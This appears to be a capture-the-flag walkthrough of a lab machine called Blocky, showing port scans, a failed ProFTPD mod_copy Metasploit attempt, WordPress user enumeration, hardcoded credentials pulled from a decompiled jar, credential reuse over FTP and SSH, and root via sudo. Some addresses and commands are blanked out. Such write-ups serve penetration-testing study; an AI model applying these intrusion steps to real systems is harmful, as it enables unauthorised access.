Nmap scan report for
Host is up (0.12s latency).
Not shown: 996 filtered ports
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)                                                                     
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos   

Running against all ports shows

21/tcp    open   ftp
22/tcp    open   ssh
80/tcp    open   http
8192/tcp  closed sophos
25565/tcp open   minecraft


anonymous login doesn’t work

─$ ftp
Connected to
220 ProFTPD 1.3.5a Server (Debian) [::ffff:]
Name ( anonymous
331 Password required for anonymous
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.

Searchsploit reveals that there two potential RCE exploits that could work

ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                              | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                    | linux/remote/36803.py

First initial run of the msf exploit doesn’t work

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[*] Started reverse TCP handler on 
[*] - - Connected to FTP server
[*] - - Sending copy commands to FTP server
[-] - Exploit aborted due to failure: unknown: - Failure copying from /proc/self/cmdline
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > 

Looking at the packets shows that the ftp server requires creds.


220 ProFTPD 1.3.5a Server (Debian) \[::ffff:\]

SITE CPFR /proc/self/cmdline

530 Please login with USER and PASS

Port 80

Greeted by standard wordpress site.

We can enumerate users by doing

Which gives us posts made by Notch. incrementing the author ID by 1 doesn’t yield any results.

From the gobuster run, we visit

Where we can download 2 jar files.

We can decompile the jar files with tools from Java Decompiler

We begin by examining BlockyCore.jar with jd-gui.

└─$ java -jar jd-gui-1.6.6.jar                                           
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

From the look of it, it appears to be SQL creds hardcoded in the jar file.

We try to use this password with the user name notch on FTP

Connected to
220 ProFTPD 1.3.5a Server (Debian) [::ffff:]
Name ( notch
331 Password required for notch
230 User notch logged in
Remote system type is UNIX.
Using binary mode to transfer files.

Looks like we got a set of valid creds:

And the directory lists looks like the home directory of notch

Trying these creds via ssh gives us a shell as well as the user flag.

Running sudo -l shows that we can run anything as sudo..

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ sudo bash -p